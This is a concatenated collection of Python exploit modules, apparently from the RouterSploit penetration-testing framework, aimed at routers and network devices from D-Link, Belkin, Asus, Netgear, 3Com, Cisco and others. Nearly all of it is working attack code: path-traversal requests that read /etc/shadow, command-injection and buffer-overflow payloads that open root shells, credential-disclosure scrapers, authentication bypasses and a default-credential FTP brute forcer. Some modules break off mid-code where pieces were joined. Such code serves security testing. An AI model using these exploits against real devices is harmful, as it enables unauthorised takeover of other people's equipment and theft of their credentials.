class Exploit(exploits.Exploit): """ Exploit implementation for 3Com Intelligent Management Center Path Traversal vulnerability. If the target is vulnerable it is possible to read file from the filesystem. """ __info__ = { 'name': '3Com IMC Path Traversal', 'description': 'Exploits 3Com Intelligent Management Center path traversal vulnerability. If the target is vulnerable it is possible to read file from the filesystem.', 'authors': [ 'Richard Brain', # vulnerability discovery 'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module ], 'references': [ 'https://www.exploit-db.com/exploits/12679/', ], 'devices': [ '3Com Intelligent Management Center', ], } target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address port = exploits.Option(8080, 'Target port') # default port filename = exploits.Option('\\windows\\win.ini', 'File to read from the filesystem') def run(self): if self.check(): print_success("Target seems to be vulnerable") url = "{}:{}/imc/report/DownloadReportSource?dirType=webapp&fileDir=reports&fileName=reportParaExample.xml..\..\..\..\..\..\..\..\..\..{}".format( self.target, self.port, self.filename) print_status("Sending paylaod request") response = http_request(method="GET", url=url) if response is None: return if response.status_code == 200 and len(response.text): print_success("Exploit success - reading {} file".format( self.filename)) print_info(response.text) else: print_error("Exploit failed - target seems to be not vulnerable") @mute def check(self): url = "{}:{}/imc/report/DownloadReportSource?dirType=webapp&fileDir=reports&fileName=reportParaExample.xml..\..\..\..\..\..\..\..\..\..\windows\win.ini".format( self.target, self.port) response = http_request(method="GET", url=url) if response is None: return False # target is not vulnerable if response.status_code == 200 and "[fonts]" in response.text: return True # target is vulnerable return False # target is not vulnerable
class Exploit(exploits.Exploit): """ Run the Forescout project-memoria-detector. """ __info__ = { 'name': 'TCP Stack Detect', 'description': '', 'authors': [ 'Dimitri Harkovski <s8ddhark[at]stud.uni-saarland.de>', 'Tobias Berdin <s8toberd[at]stud.uni-saarland.de>' ], 'references': [ '' ], 'devices': [ 'Multi', ], } target = exploits.Option('', 'Target address e.g. 192.168.1.1') # target address port = exploits.Option(80, 'Target port e.g. 80') # target port def run(self): if self.check(): print_success("Target is vulnerable") else: print_error("Target is not vulnerable") @mute def check(self): if self.target == '': return False # target has not been set return project_memoria_detector.run_project_memoria_detector(self.target, int(self.port))
class Exploit(exploits.Exploit): """ Exploit implementation for D-Link DPS-W110 Remote Code Execution vulnerability. If the target is vulnerable, command loop is invoked that allows executing commands on the device. """ __info__ = { 'name': 'D-Link DSP-W110 RCE', 'description': 'Module exploits D-Link DSP-W110 Remote Command Execution vulnerability ' 'which allows executing command on the operating system level.', 'authors': [ 'Peter Adkins <peter.adkins[at]kernelpicnic.net', # vulnerability discovery 'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module ], 'references': ['https://github.com/darkarnium/secpub/tree/master/D-Link/DSP-W110'], 'devices': ['D-Link DSP-W110 (Rev A) - v1.05b01'] } target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) port = exploits.Option(80, 'Target Port', validators=validators.integer) def run(self): if self.check(): print_status("Target might be vulnerable - difficult to verify") print_status("Invoking command loop...") print_status( "It is blind command injection, response is not available.") print_status("Spawn root shell with telnetd -l/bin/sh") shell(self, architecture="mipsbe") else: print_error("Exploit failed - target seems to be not vulnerable") def execute(self, cmd): if len(cmd) > 18: print_error("Command too long. Max is 18 characters.") return "" url = "{}:{}/".format(self.target, self.port) payload = "`{}`".format(cmd) cookies = {"i": payload} http_request(method="GET", url=url, cookies=cookies) return "" @mute def check(self): url = "{}:{}/".format(self.target, self.port) response = http_request(method="GET", url=url) if response is not None and "Server" in response.headers.keys( ) and "lighttpd/1.4.34" in response.headers['Server']: return True # target is vulnerable return False
class Exploit(exploits.Exploit): """ D-Link Scanner """ __info__ = { 'name': 'D-Link Scanner', 'description': 'Scanner module for D-Link devices', 'author': [ 'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module ], } target = exploits.Option( '', 'Target IP address e.g. 192.168.1.1') # target address port = exploits.Option(80, 'Target port') # default port def run(self): rootpath = 'routersploit/modules/' path = 'exploits/dlink/' # only py exploit files modules = [ f.replace(".py", "") for f in listdir(rootpath + path) if isfile(join(rootpath + path, f)) and f.endswith(".py") and f != "__init__.py" ] vulns = [] for module_name in modules: f = path + module_name module = imp.load_source('module', rootpath + f + '.py') exploit = module.Exploit() exploit.target = self.target exploit.port = self.port res = exploit.check() if res is True: print_success("{} is vulnerable".format(f)) vulns.append(f) elif res is False: print_error("{} is not vulnerable".format(f)) else: print_status("{} could not be verified".format(f)) print if len(vulns): print_success("Device is vulnerable!") for v in vulns: print " - {}".format(v) else: print_error("Device is not vulnerable to any exploits!") print def check(self): print_error("Check method is not available")
class Exploit(exploits.Exploit): """ Search if encryption is enabled in this telnet server. Some systems implemented encryption incorrectly, so we look if an attack would be possible. """ __info__ = { 'name': 'Telnet Encryption', 'description': '', 'authors': [ 'Dimitri Harkovski <s8ddhark[at]stud.uni-saarland.de>', 'Tobias Berdin <s8toberd[at]stud.uni-saarland.de>' ], 'references': [ '' ], 'devices': [ 'Multi', ], } target = exploits.Option('', 'Target address e.g. 192.168.1.1') # target address port = exploits.Option(2000, 'Port that runs the telnet service') # target port user = exploits.Option('root', 'User for the telnet connection') # telnet user def run(self): if self.check(): print_success("Target is vulnerable") else: print_error("Target is not vulnerable") @mute def check(self): return attack_telnet(self.target, self.port)
class Exploit(exploits.Exploit): """ Module perform dictionary attack with default credentials against FTP service. If valid credentials are found, they are displayed to the user. """ __info__ = { 'name': 'FTP Default Creds', 'author': [ 'Marcin Bury <marcin.bury[at]reverse-shell.com>' # routersploit module ] } target = exploits.Option('', 'Target IP address') port = exploits.Option(21, 'Target port') threads = exploits.Option(8, 'Numbers of threads') defaults = exploits.Option( wordlists.defaults, 'User:Pass pair or file with default credentials (file://)') verbosity = exploits.Option('yes', 'Display authentication attempts') credentials = [] def run(self): self.credentials = [] ftp = ftplib.FTP() try: ftp.connect(self.target, port=int(self.port), timeout=10) except socket.error, socket.timeout: print_error("Connection error: %s:%s" % (self.target, str(self.port))) ftp.close() return except:
class Exploit(exploits.Exploit): """ Exploit implementation for 3Com 3CRADSL72 Information Disclosure vulnerability. If the target is vulnerable it allows to read sensitive information. """ __info__ = { 'name': '3Com 3CRADSL72 Info Disclosure', 'description': 'Exploits 3Com 3CRADSL72 information disclosure vulnerability that allows to fetch credentials for SQL sa account', 'authors': [ 'Karb0nOxyde <karb0noxyde[at]gmail.com>', # vulnerability discovery 'Ivan Casado Ruiz <casadoi[at]yahoo.co.uk>', # vulnerability discovery 'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module ], 'references': [ 'http://lostmon.blogspot.com/2005/04/3com-adsl-11g-cradsl72-router.html', 'http://www.securityfocus.com/bid/11408/exploit', ], 'devices': [ '3Com 3CRADSL72', ], } target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address port = exploits.Option(80, 'Target port') # default port resources = ["/app_sta.stm", "/cgi-bin/config.bin"] def run(self): for resource in self.resources: url = "{}:{}{}".format(self.target, self.port, resource) print_status("Sending request to download sensitive information") response = http_request(method="GET", url=url) if response is None: return if response.status_code == 200 and "password" in response.text: print_success("Exploit success") print_status("Reading {} file".format(resource)) print_info(response.text) else: print_error("Exploit failed - could not retrieve response") @mute def check(self): for resource in self.resources: url = "{}:{}{}".format(self.target, self.port, resource) response = http_request(method="GET", url=url) if response is None: continue if response.status_code == 200 and "password" in response.text: return True return False # target not vulnerable
class Exploit(exploits.Exploit): """ Exploit implementation for Asmax AR 804 Remote Code Execution vulnerability. If the target is vulnerable, command loop is invoked that allows executing commands with root privileges. """ __info__ = { 'name': 'Asmax AR 804 RCE', 'authors': [ 'Michal Sajdak <*****@*****.**>', # vulnerability discovery 'Marcin Bury <*****@*****.**>', # routersploit module ], 'description': 'Module exploits Asmax AR 804 Remote Code Execution vulnerability which allows executing command on operating system level with root privileges.', 'references': [ 'http://www.securitum.pl/dh/asmax-ar-804-gu-compromise', 'https://www.exploit-db.com/exploits/8846/', ], 'targets': [ 'Asmax AR 804 gu', ], } target = exploits.Option('', 'Target address e.g. http://192.168.1.1') port = exploits.Option(80, 'Target Port') def run(self): if self.check(): print_success("Target is vulnerable") print_status("Invoking command loop...") self.command_loop() else: print_error("Target is not vulnerable") def command_loop(self): while 1: cmd = raw_input("cmd > ") print self.execute(cmd) def execute(self, cmd): url = sanitize_url("{}:{}/cgi-bin/script?system%20{}".format( self.target, self.port, cmd)) response = http_request(method="GET", url=url) if response is None: return "" return response.text @mute def check(self): mark = random_text(32) cmd = "echo {}".format(mark) response = self.execute(cmd) if mark in response: return True return False
class Exploit(exploits.Exploit): """ Exploit implementation for Belkin N750 Remote Code Execution vulnerability. If the target is vulnerable, command prompt is invoked. """ __info__ = { 'name': 'Belkin N750 RCE', 'description': 'Module exploits Belkin N750 Remote Code Execution vulnerability which allows executing commands on operation system level.', 'authors': [ 'Marco Vaz <mv[at]integrity.pt>', # vulnerability discovery 'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module ], 'references': [ 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1635', 'https://www.exploit-db.com/exploits/35184/', 'https://labs.integrity.pt/articles/from-0-day-to-exploit-buffer-overflow-in-belkin-n750-cve-2014-1635/', ], 'targets': [ 'Belkin N750', ] } target = exploits.Option('', 'Target address e.g. http://192.168.1.1') port = exploits.Option(80, 'Target Port') def run(self): if self.check() is True: print_success("Target is vulnerable") print_status("Invoking command loop...") self.command_loop() else: print_error("Target is not vulnerable") def command_loop(self): while 1: cmd = raw_input("cmd > ") print self.execute(cmd) def execute(self, cmd): url = sanitize_url("{}:{}/login.cgi.php".format(self.target, self.port)) headers = {u'Content-Type': u'application/x-www-form-urlencoded'} data = "GO=&jump=" + "A" * 1379 + ";{};&ps=\n\n".format(cmd) response = http_request(method="POST", url=url, headers=headers, data=data) if response is None: return "" return response.text @mute def check(self): mark = random_text(32) cmd = "echo {}".format(mark) response = self.execute(cmd) if mark in response: return True # target vulnerable return False # target is not vulnerable
class Exploit(exploits.Exploit): """ Exploit implementation for Belkin N150 Path Traversal vulnerability. If the target is vulnerable, content of the specified file is returned. """ __info__ = { 'name': 'Belkin N150 Path Traversal', 'description': 'Module exploits Belkin N150 Path Traversal vulnerability which allows to read any file on the system.', 'authors': [ 'Aditya Lad', # vulnerability discovery 'Rahul Pratap Singh', # vulnerability discovery 'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module ], 'references': [ 'https://www.exploit-db.com/exploits/38488/', 'http://www.belkin.com/us/support-article?articleNum=109400', 'http://www.kb.cert.org/vuls/id/774788', ], 'targets': [ 'Belkin N150 1.00.07', 'Belkin N150 1.00.08', 'Belkin N150 1.00.09', ], } target = exploits.Option('', 'Target address e.g. http://192.168.1.1') port = exploits.Option(80, 'Target Port') filename = exploits.Option('/etc/shadow', 'File to read') def run(self): url = sanitize_url( "{}:{}/cgi-bin/webproc?getpage={}&var:page=deviceinfo".format( self.target, self.port, self.filename)) response = http_request(method="GET", url=url) if response is None: return if len(response.text): print_success("Success! File: %s" % self.filename) print response.text else: print_error("Exploit failed") @mute def check(self): url = sanitize_url( "{}:{}/cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo". format(self.target, self.port)) response = http_request(method="GET", url=url) if response is None: return False # target is not vulnerable if "root:" in response.text: return True # target vulnerable return False # target is not vulnerable
class Exploit(exploits.Exploit): """ Exploit template. """ __info__ = { 'name': '', 'authors': [ '', # vulnerability discovery '', # routersploit module ], 'description': '', 'references': [ '', ], 'devices': [ '', ], } target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) port = exploits.Option(80, 'Target Port') def run(self): pass @mute def check(self): pass
class Exploit(exploits.Exploit): """ Exploit implementation for Asus RT-N16 Password Disclosure vulnerability. If the target is vulnerable it allows to read credentials for administrator. """ __info__ = { 'name': 'Asus RT-N16 Password Disclosure', 'description': 'Module exploits password disclosure vulnerability in Asus RT-N16 devices that allows to fetch credentials for the device.', 'authors': [ 'Harry Sintonen', # vulnerability discovery 'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module ], 'references': [ 'https://sintonen.fi/advisories/asus-router-auth-bypass.txt' ], 'devices': [ 'ASUS RT-N10U, firmware 3.0.0.4.374_168', 'ASUS RT-N56U, firmware 3.0.0.4.374_979', 'ASUS DSL-N55U, firmware 3.0.0.4.374_1397', 'ASUS RT-AC66U, firmware 3.0.0.4.374_2050', 'ASUS RT-N15U, firmware 3.0.0.4.374_16', 'ASUS RT-N53, firmware 3.0.0.4.374_311', ], } target = exploits.Option('', 'Target address e.g. http://192.168.1.1') # target address port = exploits.Option(8080, 'Target port') # default port def run(self): url = sanitize_url("{}:{}/error_page.htm".format(self.target, self.port)) response = http_request(method="GET", url=url) if response is None: return creds = re.findall("if\('1' == '0' \|\| '(.+?)' == 'admin'\)", response.text) if len(creds): c = [("admin", creds[0])] print_success("Credentials found!") headers = ("Login", "Password") print_table(headers, *c) else: print_error("Credentials could not be found") @mute def check(self): url = sanitize_url("{}:{}/error_page.htm".format(self.target, self.port)) response = http_request(method="GET", url=url) if response is None: return False # target is not vulnerable creds = re.findall("if\('1' == '0' \|\| '(.+?)' == 'admin'\)", response.text) if len(creds): return True # target is vulnerable return False # target is not vulnerable
class Exploit(exploits.Exploit): """ Exploit implementation for D-Link DIR-300, DIR-320, DIR-615 Authentication Bypass vulnerability. If the target is vulnerable link to bypass authentication will be provided" """ __info__ = { 'name': 'D-Link DIR-300 & DIR-320 & DIR-615 Auth Bypass', 'description': 'Module exploits authentication bypass vulnerability in D-Link DIR-300, DIR-320, DIR-615 revD devices. It is possible to access administration panel without providing password.', 'authors': [ 'Craig Heffner', # vulnerability discovery 'Karol Celin', # vulnerability discovery 'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module ], 'references': [ 'http://www.devttys0.com/wp-content/uploads/2010/12/dlink_php_vulnerability.pdf', ], 'devices': [ 'D-Link DIR-300', 'D-Link DIR-600', 'D-Link DIR-615 revD', ] } target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address port = exploits.Option(80, 'Target port') # default port def run(self): if self.check(): print_success("Target is vulnerable") print "\nYou need to add NO_NEED_AUTH=1&AUTH_GROUP=0 to query string for every action." print "\nExamples:" print "{}:{}/bsc_lan.php?NO_NEED_AUTH=1&AUTH_GROUP=0".format(self.target, self.port) print "{}:{}/bsc_wlan.php?NO_NEED_AUTH=1&AUTH_GROUP=0\n".format(self.target, self.port) else: print_error("Target seems to be not vulnerable") @mute def check(self): # check if it is valid target url = "{}:{}/bsc_lan.php".format(self.target, self.port) response = http_request(method="GET", url=url) if response is None: return False # target is not vulnerable if '<form name="frm" id="frm" method="post" action="login.php">' not in response.text: return False # target is not vulnerable # checking if authentication can be baypassed url = "{}:{}/bsc_lan.php?NO_NEED_AUTH=1&AUTH_GROUP=0".format(self.target, self.port) response = http_request(method="GET", url=url) if response is None: return False # target is not vulnerable if '<form name="frm" id="frm" method="post" action="login.php">' not in response.text: return True # target is vulnerable return False # target is not vulnerable
class Exploit(exploits.Exploit): """ Exploit implementation for WePresent WiPG-1000 Command Injection vulnerability. If the target is vulnerable, it is possible to execute commands on operating system level. """ __info__ = { 'name': 'WePresent WiPG-1000 RCE', 'description': 'Module exploits WePresent WiPG-1000 Command Injection vulnerability which allows ' 'executing commands on operating system level.', 'authors': [ 'Matthias Brun', # vulnerability discovery 'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module ], 'references': [ 'https://www.redguard.ch/advisories/wepresent-wipg1000.txt', ], 'devices': [ 'WePresent WiPG-1000 <=2.0.0.7', ], } target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) port = exploits.Option(80, 'Target Port', validators=validators.integer) def run(self): if self.check(): print_success("Target seems to be vulnerable") print_status( "This is blind command injection, response is not available") shell(self, architecture="mipsbe", binary="netcat", shell="/bin/sh") else: print_error("Exploit failed - exploit seems to be not vulnerable") def execute(self, cmd): """ callback used by shell functionality """ payload = ";{};".format(cmd) url = "{}:{}/cgi-bin/rdfs.cgi".format(self.target, self.port) data = {"Client": payload, "Download": "Download"} http_request(method="POST", url=url, data=data) return "" @mute def check(self): url = "{}:{}/cgi-bin/rdfs.cgi".format(self.target, self.port) response = http_request(method="GET", url=url) if response is not None and "Follow administrator instructions to enter the complete path" in response.text: return True # target vulnerable return False # target is not vulnerable
class Exploit(exploits.Exploit): """ Exploit implementation for 2Wire Gateway devices Authentication Bypass vulnerability. If the target is vulnerable link to bypass authentication is provided" """ __info__ = { 'name': '2Wire Gateway Auth Bypass', 'description': 'Module exploits 2Wire Gateway authentication bypass vulnerability. ' 'If the target is vulnerable link to bypass authentication is provided.', 'authors': [ 'bugz', # vulnerability discovery 'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module ], 'references': [ 'https://www.exploit-db.com/exploits/9459/', ], 'devices': [ '2Wire 2701HGV-W', '2Wire 3800HGV-B', '2Wire 3801HGV', ], } target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address port = exploits.Option(80, 'Target port') # default port def run(self): if self.check(): print_success("Target is vulnerable") print_info("\nUse your browser:") print_info("{}:{}/xslt".format(self.target, self.port)) else: print_error("Target seems to be not vulnerable") @mute def check(self): mark = '<form name="pagepost" method="post" action="/xslt?PAGE=WRA01_POST&NEXTPAGE=WRA01_POST" id="pagepost">' # checking if the target is valid url = "{}:{}/".format(self.target, self.port) response = http_request(method="GET", url=url) if response is None: return False # target is not vulnerable if mark not in response.text: return False # target is not vulnerable # checking if authentication can be bypassed url = "{}:{}/xslt".format(self.target, self.port) response = http_request(method="GET", url=url) if response is None: return False # target is not vulnerable if mark not in response.text: return True # target vulnerable return False # target not vulnerable
class Exploit(exploits.Exploit): """ Exploit implementation for Movistar ADSL Router BHS_RTA Path Traversal vulnerability. If the target is vulnerable, content of the specified file is returned. """ __info__ = { 'name': 'Movistar ADSL Router BHS_RTA Path Traversal', 'description': 'Module exploits Movistar ADSL Router BHS_RTA Path Traversal vulnerability which allows to read any file on the system.', 'authors': [ 'Todor Donev <todor.donev[at]gmail.com>', # vulnerability discovery 'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module ], 'references': [ 'https://www.exploit-db.com/exploits/40734/', ], 'devices': [ 'Movistar ADSL Router BHS_RTA', ], } target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) port = exploits.Option(80, 'Target Port') filename = exploits.Option('/etc/shadow', 'File to read') def run(self): if self.check(): url = "{}:{}/cgi-bin/webproc?getpage={}&var:language=es_es&var:page=".format( self.target, self.port, self.filename) response = http_request(method="GET", url=url) if response is None: return if response.status_code == 200 and len(response.text): print_success("Success! File: %s" % self.filename) print response.text else: print_error("Exploit failed") else: print_error("Device seems to be not vulnerable") @mute def check(self): url = "{}:{}/cgi-bin/webproc?getpage=/etc/passwd&var:language=es_es&var:page=".format( self.target, self.port) response = http_request(method="GET", url=url) if response is None: return False # target is not vulnerable if "root:" in response.text: return True # target vulnerable return False # target is not vulnerable
class Exploit(exploits.Exploit): """ Exploit implementation for Asmax AR 804 Remote Code Execution vulnerability. If the target is vulnerable, command loop is invoked that allows executing commands with root privileges. """ __info__ = { 'name': 'Asmax AR 804 RCE', 'authors': [ 'Michal Sajdak <michal.sajdak[at]securitum.com>', # vulnerability discovery 'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module ], 'description': 'Module exploits Asmax AR 804 Remote Code Execution vulnerability which ' 'allows executing command on operating system level with root privileges.', 'references': [ 'http://www.securitum.pl/dh/asmax-ar-804-gu-compromise', 'https://www.exploit-db.com/exploits/8846/', ], 'devices': [ 'Asmax AR 804 gu', ], } target = exploits.Option('', 'Target URL address e.g. http://192.168.1.1', validators=validators.url) # target url address port = exploits.Option(80, 'Target HTTP port', validators=validators.integer) # target http port def run(self): print_status("Checking if target is vulnerable") if self.check(): print_success("Target is vulnerable") print_status("Invoking command loop...") shell(self, architecture="mips") else: print_error("Exploit failed - target seems to be not vulnerable") def execute(self, cmd): """ callback used by shell functionality """ url = "{}:{}/cgi-bin/script?system%20{}".format(self.target, self.port, cmd) response = http_request(method="GET", url=url) if response is None: return "" return response.text @mute def check(self): cmd = "cat /etc/passwd" url = "{}:{}/cgi-bin/script?system%20{}".format(self.target, self.port, cmd) response = http_request(method="GET", url=url) if response is None: return False # target is not vulnerable if response.status_code == 200 and "root:" in response.text: return True # target is vulnerable return False # target is not vulnerable
class Exploit(exploits.Exploit): """ Exploit implementation for Belkin G and N150 Password MD5 Disclosure vulnerability. If the target is vulnerable, password in MD5 format is returned. """ __info__ = { 'name': 'Belkin G & N150 Password Disclosure', 'description': 'Module exploits Belkin G and N150 Password MD5 Disclosure vulnerability which allows fetching administration\'s password in md5 format', 'authors': [ 'Aodrulez <f3arm3d3ar[at]gmail.com>', # vulnerability discovery 'Avinash Tangirala', # vulnerability discovery 'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module ], 'references': [ 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2765', 'https://www.exploit-db.com/exploits/17349/', ], 'devices': [ 'Belkin G', 'Belkin N150', ], } target = exploits.Option('', 'Target address e.g. http://192.168.1.1') port = exploits.Option(80, 'Target Port') def run(self): url = sanitize_url("{}:{}/login.stm".format(self.target, self.port)) response = http_request(method="GET", url=url) if response is None: return val = re.findall('password = "******"', response.text) if len(val): print_success("Exploit success") data = [('admin', val[0])] headers = ("Login", "MD5 Password") print_table(headers, *data) else: print_error("Exploit failed. Device seems to be not vulnerable.") @mute def check(self): url = sanitize_url("{}:{}/login.stm".format(self.target, self.port)) response = http_request(method="GET", url=url) if response is None: return False # target is not vulnerable val = re.findall('password = "******"', response.text) if len(val): return True # target vulnerable return False # target is not vulnerable
class Exploit(exploits.Exploit): """ Exploit implementation for Path Traversal vulnerability in Cisco Video Surveillance Operations Manager 6.3.2 devices. If the target is vulnerable, it allows to read files from the filesystem. """ __info__ = { 'name': 'Cisco Unified Multi Path Traversal', 'description': 'Module exploits path traversal vulnerability in Cisco Video Surveillance Operations Manager 6.3.2 devices.' 'If the target is vulnerable it allows to read files from the filesystem.', 'authors': [ 'b.saleh', # vulnerability discovery 'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module ], 'references': [ 'https://www.exploit-db.com/exploits/38389/', ], 'devices': [ 'Cisco Video Surveillance Operations Manager 6.3.2', ], } target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) port = exploits.Option(80, 'Target Port') filename = exploits.Option('/etc/passwd', 'File to read from the filesystem') def run(self): url = "{}:{}/BWT/utils/logs/read_log.jsp?filter=&log=../../../../../../../../..{}".format( self.target, self.port, self.filename) response = http_request(method="GET", url=url) if response is None: return if response.status_code == 200 and len(response.text): print_success("Exploit success") print_status("Reading file: {}".format(self.filename)) print_info(response.text) else: print_error("Exploit failed - could not read file") @mute def check(self): url = "{}:{}/BWT/utils/logs/read_log.jsp?filter=&log=../../../../../../../../../etc/passwd".format( self.target, self.port) response = http_request(method="GET", url=url) if response is None: return False # target is not vulnerable if response.status_code == 200 and len(response.text): return True # target is vulnerable return False # target is not vulnerable
class Exploit(exploits.Exploit): """ Check what SSH authentication methods are available. """ __info__ = { 'name': 'SSH Auth Methods', 'description': '', 'authors': [ 'Dimitri Harkovski <s8ddhark[at]stud.uni-saarland.de>', 'Tobias Berdin <s8toberd[at]stud.uni-saarland.de>' ], 'references': [''], 'devices': [ 'Multi', ], } target = exploits.Option( '', 'Target address e.g. 192.168.1.1') # target address port = exploits.Option(22, 'Target port e.g. 22') # target port def run(self): if self.check(): print_success("Target is vulnerable") else: print_error("Target is not vulnerable") @mute def check(self): if self.target == '': return False # target has not been set try: t = paramiko.Transport((self.target, int(self.port))) except: return False methods = [] try: t.connect() except paramiko.ssh_exception.SSHException: t.close() return False # no ssh connection point can be found try: t.auth_none('') except paramiko.BadAuthenticationType as err: methods = err.allowed_types finally: t.close() print('Supported method: %s' % methods) if u'publickey' not in methods: return True # public key authentication is not enabled -> target connection only possible with password return False
class Exploit(exploits.Exploit): """ Exploit implementation for D-Link DVG-N5402SP path traversal vulnerability. If the target is vulnerable it allows to read files from the device." """ __info__ = { 'name': 'D-Link DVG-N5402SP Path Traversal', 'description': 'Module exploits D-Link DVG-N5402SP path traversal vulnerability, which allows reading files form the device', 'authors': [ 'Karn Ganeshen', # vulnerability discovery 'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module ], 'references': [ 'https://www.exploit-db.com/exploits/39409/', 'http://ipositivesecurity.blogspot.com/2016/02/dlink-dvgn5402sp-multiple-vuln.html', ], 'devices': [ 'D-Link DVG-N5402SP', ] } target = exploits.Option('', 'Target address e.g. http://192.168.1.1') # target address port = exploits.Option(8080, 'Target port') # default port filename = exploits.Option('/etc/shadow', 'File to read') # file to read def run(self): # address and parameters url = "{}:{}/cgi-bin/webproc".format(self.target, self.port) data = {"getpage": "html/index.html","*errorpage*": "../../../../../../../../../../..{}".format(self.filename), "var%3Amenu": "setup", "var%3Apage": "connected", "var%": "", "objaction": "auth", "%3Ausername": "******", "%3Apassword": "******","%3Aaction": "login","%3Asessionid": "abcdefgh"} # connection response = http_request(method="POST", url=url, data=data) if response is None: return if response.status_code == 200: print_success("Exploit success") print_status("File: {}".format(self.filename)) print response.text else: print_error("Exploit failed") @mute def check(self): # address and parameters url = "{}:{}/cgi-bin/webproc".format(self.target, self.port) data = {"getpage": "html/index.html","*errorpage*": "../../../../../../../../../../../etc/shadow", "var%3Amenu": "setup", "var%3Apage": "connected", "var%": "", "objaction": "auth", "%3Ausername": "******", "%3Apassword": "******","%3Aaction": "login","%3Asessionid": "abcdefgh"} # connection response = http_request(method="POST", url=url, data=data) if response is None: return False # target is not vulnerable if "root" in response.text: return True # target vulnerable return False # target not vulnerable
class Exploit(exploits.Exploit): """ Exploit implementation for D-Link DIR-300, DIR-320, DIR-600, DIR-615 Information Disclosure vulnerability. If the target is vulnerable it allows to read credentials for administrator." """ __info__ = { 'name': 'D-Link DIR-300 & DIR-320 & DIR-600 & DIR-615 Info Disclosure', 'description': 'Module explois information disclosure vulnerability in D-Link DIR-300, DIR-320, DIR-600, DIR-615 devices. It is possible to retrieve sensitive information such as credentials.', 'authors': [ 'tytusromekiatomek <tytusromekiatomek[at]inbox.com>', # vulnerability discovery 'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module 'Aleksandr Mikhaylov <chelaxe[at]gmail.com>', # routersploit module ], 'references': [ 'http://seclists.org/bugtraq/2013/Dec/11' ], 'devices': [ 'D-Link DIR-300 (all)', 'D-Link DIR-320 (all)', 'D-Link DIR-600 (all)', 'D-Link DIR-615 (fw 4.0)', ], } target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address port = exploits.Option(80, 'Target port') # default port def run(self): url = "{}:{}/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd".format(self.target, self.port) response = http_request(method="GET", url=url) if response is None: return creds = re.findall("\n\t\t\t(.+?):(.+?)\n\n\t\t\t", response.text) if len(creds): print_success("Credentials found!") headers = ("Login", "Password") print_table(headers, *creds) else: print_error("Credentials could not be found") @mute def check(self): url = "{}:{}/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd".format(self.target, self.port) response = http_request(method="GET", url=url) if response is None: return False # target is not vulnerable creds = re.findall("\n\t\t\t(.+?):(.+?)\n\n\t\t\t", response.text) if len(creds): return True # target is vulnerable return False # target is not vulnerable
class Exploit(exploits.Exploit): """ Scanner implementation for all vulnerabilities. """ __info__ = { 'name': 'AutoPwn', 'description': 'Scanner module for all vulnerabilities.', 'authors': [ 'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module ], 'references': ('', ), 'devices': ('Multi', ), } vendor = '' target = exploits.Option( '', 'Target IP address e.g. 192.168.1.1') # target address port = exploits.Option(80, 'Target port') # default port threads = exploits.Option(8, "Number of threads") def __init__(self): self.vulnerabilities = [] self._exploits_directory = path.join(utils.EXPLOITS_DIR, self.vendor) def run(self): self.vulnerabilities = [] with threads.ThreadPoolExecutor(self.threads) as executor: for exploit in utils.iter_modules(self._exploits_directory): executor.submit(self.target_function, exploit) print_info() if self.vulnerabilities: print_success("Device is vulnerable!") for v in self.vulnerabilities: print_info(" - {}".format(v)) print_info() else: print_error("Device is not vulnerable to any exploits!\n") def check(self): raise NotImplementedError("Check method is not available") def target_function(self, exploit): exploit = exploit() exploit.target = self.target exploit.port = self.port response = exploit.check() if response is True: print_success("{} is vulnerable".format(exploit)) self.vulnerabilities.append(exploit) elif response is False: print_error("{} is not vulnerable".format(exploit)) else: print_status("{} could not be verified".format(exploit))
class Exploit(exploits.Exploit): """ Exploit implementation for Netgear N300 Authentication Bypass vulnerability. If the target is vulnerable link to bypass authentication will be provided" """ __info__ = { 'name': 'Netgear N300 Auth Bypass', 'description': 'Module exploits authentication bypass vulnerability in Netgear N300 devices. It is possible to access administration panel without providing password.', 'authors': [ 'Daniel Haake <daniel.haake[at]csnc.de>', # vulnerability discovery 'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module ], 'references': [ 'https://www.compass-security.com/fileadmin/Datein/Research/Advisories/CSNC-2015-007_Netgear_WNR1000v4_AuthBypass.txt' ], 'targets': [ 'Netgear N300', ] } target = exploits.Option( '', 'Target address e.g. http://192.168.1.1') # target address port = exploits.Option(80, 'Target port') # default port def run(self): if self.check(): print_success("Target is vulnerable") url = sanitize_url("{}:{}".format(self.target, self.port)) print "Visit {}/BRS_netgear_success.html\n".format(url) else: print_error("Target seems to be not vulnerable") @mute def check(self): url = sanitize_url("{}:{}/".format(self.target, self.port)) response = http_request(method="GET", url=url) if response is None: return False # target is not 